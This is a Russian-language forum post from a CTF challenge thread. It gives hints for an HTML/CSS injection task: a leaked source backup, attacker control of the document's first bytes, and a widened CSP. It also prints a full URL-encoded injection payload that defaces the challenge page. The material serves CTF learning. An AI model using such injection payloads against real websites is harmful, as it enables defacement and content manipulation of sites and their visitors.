
22.07.2020, 23:14
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 685
С нами:
5344886
Репутация:
441
|
|
Окай, что-то негусто у нас с умеющими, а тем более со знающими, будем хинтить
- С самого старта задания присутствует бекап исходников - http://css.ctf.antichat.com/index.php~
- В случае с XSS, атакующий контролирует первые байты документа (?)
- console.log(), в сорцах HTML, криво намекает, что пейлоды отлаживать следует именно так
- С этого момента, в CSP добавлен более широкий скоуп, что даёт большее количство вариантов эксплуатации в обоих случаях. Пример для "дефейса":
Код:
# Открывать в десктопном FireFox, хром какашка :(
http://css.ctf.antichat.com/?i=%3Cimg/class=%27i%27/src=%27https://cdn.pixabay.com/photo/2015/10/08/16/14/click-978023_640.png%27/%3E%3Cstyle%3Ebody{cursor:pointer;color:yellow;transform:perspective(300px)%20rotateX(20deg);%20position:absolute;%20top:-200;%20bottom:200px;left:50px;right:50px;}marquee{width:100%;height:100%}.o{animation:blinker%203s%20linear%20infinite;}@keyframes%20blinker{50%%20{opacity:%200;}}.i{position:absolute;width:10%;top:10%;right:0%}.a{width:100%;height:100%;opacity:0;position:absolute;z-index:99}%3C/style%3E%3Caudio%20class=%22a%22%20controls%3E%3Csource%20src=%22https://antichat.com/attachments/10457/%22/type=%22audio/mpeg%22%3E%3C/audio%3E%3C/marquee%3E%3Cmarquee%20class=o%20direction=up%3E
|
|
|